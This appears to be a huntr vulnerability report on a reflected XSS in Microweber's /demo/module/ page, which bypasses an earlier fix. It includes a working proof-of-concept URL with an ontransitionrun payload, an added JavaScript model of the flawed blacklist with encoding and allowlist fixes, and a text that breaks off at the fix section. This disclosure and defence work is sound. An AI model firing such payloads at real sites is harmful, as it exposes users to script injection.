huntr / wfinn / B8E5C324-3DFE-46B4-8095-1697C6B0A6D6
History: Apr 22, 2022 - 6:04 p.m.

XSS in /demo/module/?module=HERE

2022-04-22 18:04:52
wfinn
www.huntr.dev
15

CVSS3: 6.1 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVSS2: 4.3 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N

EPSS: 0.001 Low
Percentile: 27.5%

Description

Reflected XSS in /demo/module/?module= (bypass of the fix for CVE-2022-1439)

Proof of Concept

In this report I showed an XSS, and while one of the filter evasion mechanisms was fixed, the root cause persists and allows other payloads.

As I mentioned, there are event handlers which are unblocked, so even without the <x> trick from the last report, you can get XSS.
Here I use ontransitionrun; there are more, and there will always be more event handlers, so a blacklist approach will fail here.

https://demo.microweber.org/demo/module/?module=%27ontransitionrun=alert(1)%27%22tabindex=1&style=transition:outline%200.001s&id=x&data-show-ui=admin&class=x&from_url=https://demo.microweber.org

Hitting “tab” will fire the payload.
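The following is an added example, not code from this report or from Microweber. It models the pattern described above: a query parameter reflected into an element attribute, "fixed" by stripping a list of known on* handlers. The template, the handler blacklist, the attribute name and the module-name pattern are assumptions; the real /demo/module/ markup is not reproduced here, and the constructed payload targets a double-quoted attribute rather than reusing the report's exact quoting. It shows the blacklist missing ontransitionrun while attribute encoding and an allowlist both keep the injected text inert, and it uses a small attribute tokenizer (not a sanitizer) as the oracle for what a browser would see as separate attributes.

```javascript
// Added example (not Microweber's code). Everything below is a hypothetical
// stand-in for the reflected-attribute page described in the report.

// Constructed payload in the style of the PoC: close the quoted attribute,
// add an event handler that is not on the blacklist, and make the element
// focusable with a CSS transition so pressing Tab (focus -> outline change)
// fires ontransitionrun.
const PAYLOAD =
  'x" ontransitionrun="alert(1)" tabindex="1" style="transition:outline 0.001s';

// Hypothetical blacklist of "well-known" handlers: the approach the report
// says is doomed, because it only strips the handlers it has heard of.
const BLOCKED_HANDLERS = /\bon(click|load|error|mouseover|focus|blur)\s*=/gi;

function blacklistFilter(value) {
  return String(value).replace(BLOCKED_HANDLERS, "");
}

// Vulnerable renderer: interpolates the filtered value straight into a
// double-quoted attribute (assumed attribute name "data-module").
function renderBlacklisted(moduleName) {
  return `<div class="x" data-module="${blacklistFilter(moduleName)}"></div>`;
}

// Fix 1: HTML attribute encoding. Every character that could end the quoted
// value or start a new attribute is encoded, so the payload stays inert text.
function encodeAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderEncoded(moduleName) {
  return `<div class="x" data-module="${encodeAttr(moduleName)}"></div>`;
}

// Fix 2: allowlist. A module name is an identifier, so reject anything else
// before it reaches the template. The pattern is an assumption about what
// valid module names look like.
const MODULE_NAME = /^[A-Za-z0-9_\/-]{1,64}$/;

function renderAllowlisted(moduleName) {
  if (!MODULE_NAME.test(moduleName)) {
    throw new Error("invalid module name");
  }
  return `<div class="x" data-module="${moduleName}"></div>`;
}

// Test oracle, not a sanitizer: tokenize the first start tag the way a
// browser roughly would (quoted values run to the matching quote, unquoted
// values to whitespace or ">") and return the attribute names it contains.
function attributeNames(html) {
  const names = [];
  let i = html.indexOf("<");
  if (i < 0) return names;
  i++;
  while (i < html.length && /[^\s\/>]/.test(html[i])) i++; // skip tag name
  while (i < html.length) {
    while (i < html.length && /[\s\/]/.test(html[i])) i++;
    if (i >= html.length || html[i] === ">") break;
    let name = "";
    while (i < html.length && /[^\s\/>=]/.test(html[i])) name += html[i++];
    names.push(name.toLowerCase());
    while (i < html.length && /\s/.test(html[i])) i++;
    if (html[i] === "=") {
      i++;
      while (i < html.length && /\s/.test(html[i])) i++;
      const q = html[i];
      if (q === '"' || q === "'") {
        const end = html.indexOf(q, i + 1);
        i = end < 0 ? html.length : end + 1;
      } else {
        while (i < html.length && /[^\s>]/.test(html[i])) i++;
      }
    }
  }
  return names;
}

// Any attribute whose name starts with "on" is an event handler, whichever
// handler it is; this is the generic check a blacklist can never match.
function eventHandlers(html) {
  return attributeNames(html).filter((n) => n.startsWith("on"));
}
```

Calling eventHandlers(renderBlacklisted(PAYLOAD)) returns ["ontransitionrun"] even though the same filter does neutralise an onclick payload, while renderEncoded(PAYLOAD) yields a tag with only the class and data-module attributes and renderAllowlisted(PAYLOAD) throws before anything is rendered. The oracle is deliberately generic: when checking a fix, look for any on* attribute that survived, not for the handlers you already know about.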

How to fix this

The HTML looks like this:

<div>
